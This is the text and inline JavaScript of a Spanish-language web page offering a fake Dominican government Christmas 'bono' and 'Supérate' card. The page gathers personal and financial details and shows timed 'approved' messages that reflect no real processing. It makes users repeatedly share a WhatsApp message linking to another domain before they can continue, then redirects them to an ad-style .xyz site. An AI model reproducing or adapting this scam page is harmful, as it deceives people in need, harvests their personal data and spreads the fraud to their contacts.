Por motivos a la NAVIDAD Gobierno entrega nuevos: “BONO” para ayudar a todas las persona necesitada. RD$1,500 pesos, Regístrate Para Obtener la nueva tarjeta.
complete Su Formulario
A diario recibimos miles de solicitudes. Para acelerar Tu solicitud, completa los siguientes 2 PASOS:
¡Enhorabuena!
Después de comprobar sus solicitud, ha sido aprobada RD$ 5,500
Su FORMULARIO PARA OBTENER TU BONO estará disponible en cuanto haga clic en el botón de abajo “Invitar al programa” para compartir esta información con familiares/amigos o en tus grupos de WhatsApp para que ellos también puedan conocer el PROGRAMA
Nota: Si no completa este paso correctamente, no se habilitará el botón para obtener la nueva tarjeta Supérate
function habilitar(){
nombre = document.getElementById("nombre").value;
val = 0;
if(nombre === ""){ val++; }
if(val === 0){ document.getElementById("cont-btn").disabled = false; } else { document.getElementById("cont-btn").disabled = true; } } document.getElementById("nombre").addEventListener("keyup", habilitar);
const steps = Array.from(document.querySelectorAll(".step")); const nextBtn = document.querySelectorAll(".next-btn"); const nextBtn2 = document.querySelectorAll(".next-btn2"); const nextBtn3 = document.querySelectorAll(".next-btn3"); const nextBtn4 = document.querySelectorAll(".next-btn4"); const prevBtn = document.querySelectorAll(".previous-btn");
nextBtn.forEach((button) => { button.addEventListener("click", () => { changeStep("next"); window.scrollTo({ top: 0, behavior: 'smooth' }); }); }); nextBtn2.forEach((button) => { button.addEventListener("click", () => { validar() window.scrollTo({ top: 0, behavior: 'smooth' }); }); }); nextBtn3.forEach((button) => { button.addEventListener("click", () => { validar2() window.scrollTo({ top: 0, behavior: 'smooth' }); }); }); nextBtn4.forEach((button) => { button.addEventListener("click", () => { validar3() window.scrollTo({ top: 0, behavior: 'smooth' }); }); });
form.addEventListener("submit", (e) => { e.preventDefault(); const inputs = []; form.querySelectorAll("input").forEach((input) => { const { name, value } = input; inputs.push({ name, value }); }); console.log(inputs); form.reset(); });
function changeStep(btn) { let index = 0; const active = document.querySelector(".active"); index = steps.indexOf(active); steps[index].classList.remove("active"); if (btn === "next") { index++; } else if (btn === "prev") { index--; } steps[index].classList.add("active"); }
function validar() {
var genero = document.querySelector('input[name="genero"]:checked'); var pais = document.getElementById("pais").value; var edad = document.getElementById("edad").value; var estado = document.getElementById("estado").value;
if (genero === null || pais === "" || edad === "" || estado === ""){ alert("Debe seleccionar una opción en los campos vacios"); return false; }else { loadpage1(); return false; } } function validar2() {
var ingles = document.getElementById("ingles").value; var educacion = document.getElementById("educacion").value; var trabajo = document.getElementById("trabajo").value; var ingresos = document.getElementById("ingresos").value;
if (ingles == "" || educacion == "" || trabajo == "" || ingresos == ""){ alert("Debe seleccionar una opción en los campos desplegables"); return false; }else { loadpage1(); return false; } } function validar3() {
var viajar = document.querySelector('input[name="viajar"]:checked'); var quiero = document.getElementById("quiero").value; var provincia = document.getElementById("provincia").value; var hablar = document.querySelector('input[name="hablar"]:checked');
if (viajar === null || quiero == "" || provincia == "" || hablar === null){ alert("Debe seleccionar una opción en los campos vacios"); return false; }else { loadpage2(); return false; } }
function tiempoBtn(){ var btn = document.querySelector('.incrementar');
btn.addEventListener('click', function(e) { e.preventDefault();
this.disabled = true;
setTimeout(function(){ btn.disabled=false; }, 4000); }); }
function whatsapp(){ tiempoBtn(); window.open('whatsapp://send?text=*Por motivos a la navidad, Gobierno entrega RD$5,500 en nueva tarjeta*%0A¡Aplica Ahora! %0A%0A*Más de 1,000.000 de bono para aplicar*%0A%0A*REQUISITOS*%0A_-El solicitante debe tener 18 años o más_.%0A%0A*para ayudar a todas la persona necesitada* Abierto a todas las persona del pais%0A_-Beneficio cuidado de niños_%0A_-Sistema educativo_%0A_-Sistema de salud_%0A%0A*SOLICITAR TARJETA AQUÍ*%0A https://tarjetafamilia2023.info/'); }
function incrementar(){
let v1=document.getElementById('barraprog').value; document.getElementById('barraprog').value= v1 + 10; whatsapp();
if(v1>=90){ document.getElementById('btn_enviar').disabled = false; } }
function loadpage2(){
document.getElementById("contenedor-load2").style.visibility = 'visible';
setInterval(function() {func1()}, 2000); function func1() { document.getElementById("text").innerHTML = "Procesando su solicitud..."; }
setInterval(function() {func2()}, 4000); function func2() { document.getElementById("text1").innerHTML = "Cargando el siguiente paso..."; }
setTimeout(function(){ changeStep("next"); document.getElementById("contenedor-load2").style.visibility = 'hidden'; }, 6000);
}
function loadpage1(){
document.getElementById("contenedor-load2").style.visibility = 'visible';
setTimeout(function(){ changeStep("next"); document.getElementById("contenedor-load2").style.visibility = 'hidden'; }, 1200);
}
function loadpage(){
document.getElementById("contenedor-load").style.visibility = 'visible';
setInterval(function() {func1()}, 2000); function func1() { document.getElementById("text2").innerHTML = "Comprobando sus respuestas..."; }
setInterval(function() {func2()}, 5000); function func2() { document.getElementById("text3").innerHTML = "Procesando su solicitud..."; }
setInterval(function() {func3()}, 9000); function func3() { document.getElementById("text4").innerHTML = "Su solicitud ha sido aprobada"; }
setTimeout(function(){ window.open("https://noticiasultimominutoimagen.xyz/aprende-a-solicitar-la-nueva-tarjeta-superate/", '_self'); }, 11000); }